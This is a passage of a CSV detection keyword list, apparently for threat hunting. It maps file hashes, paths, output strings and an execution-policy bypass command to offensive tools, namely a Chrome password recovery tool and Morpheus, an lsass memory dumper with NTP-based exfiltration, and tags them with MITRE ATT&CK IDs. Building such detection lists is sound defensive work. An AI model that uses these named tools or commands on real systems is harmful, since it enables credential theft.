"*7eb6b7bb1ae807bb1610715069bde4c790d698924926eb8e9a59ce41e2dc327f*",".{0,1000}7eb6b7bb1ae807bb1610715069bde4c790d698924926eb8e9a59ce41e2dc327f.{0,1000}","offensive_tool_keyword","Chrome-Password-Recovery","recover Google Chrome Logins","T1555.003 - T1005 - T1027","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/SaturnsVoid/Chrome-Password-Recovery","1","0","#filehash","N/A","8","1","75","31","2021-02-05T00:36:39Z","2017-04-07T17:32:27Z","63761" "*Aur3ns/lsassStealer*",".{0,1000}Aur3ns\/lsassStealer.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/lsassStealer","1","1","N/A","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63762" "*Aur3ns/Morpheus*",".{0,1000}Aur3ns\/Morpheus.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","1","N/A","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63763" "*[+] Decoded target process: lsass.exe*",".{0,1000}\[\+\]\sDecoded\starget\sprocess\:\slsass\.exe.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","#content","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63764" "*Set-ExecutionPolicy Bypass -Scope Process -Force; ./run.ps1*",".{0,1000}Set\-ExecutionPolicy\sBypass\s\-Scope\sProcess\s\-Force\;\s\.\/run\.ps1.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that 
extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","N/A","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63765" "*\memdump.exe*",".{0,1000}\\memdump\.exe.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","N/A","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63766" "*126e1149940a288389cee23653f889ad5edadc77c5944d6700229dfd573e5327*",".{0,1000}126e1149940a288389cee23653f889ad5edadc77c5944d6700229dfd573e5327.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","#filehash","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63767" "*ad8d2c8c861bc21e5768c4509027b36ae269f30b38efaeb9a1f990c0257479b2*",".{0,1000}ad8d2c8c861bc21e5768c4509027b36ae269f30b38efaeb9a1f990c0257479b2.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","#filehash","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63768" "*ec45956c13d4f7e2eb4af57ad7ccdb8ff8ac14d0e524e2f676fdec002cc8bf79*",".{0,1000}ec45956c13d4f7e2eb4af57ad7ccdb8ff8ac14d0e524e2f676fdec002cc8bf79.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged 
NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","#filehash","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63769" "*a05b50e5814778371a6e565e659997211603dcb723bffd14eae9027ca7f557c3*",".{0,1000}a05b50e5814778371a6e565e659997211603dcb723bffd14eae9027ca7f557c3.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","#filehash","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63770" "*\temp\*\dumpfile_*.dmp*",".{0,1000}\\temp\\.{0,1000}\\dumpfile_.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","N/A","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63771" "*--best memdump.exe*",".{0,1000}\-\-best\smemdump\.exe.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","N/A","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63772" "*function Obfuscate-Executable*",".{0,1000}function\sObfuscate\-Executable.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential 
Access","https://github.com/Aur3ns/Morpheus","1","0","#content","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63773" "*\dump_memory.bin*",".{0,1000}\\dump_memory\.bin.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","N/A","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63774"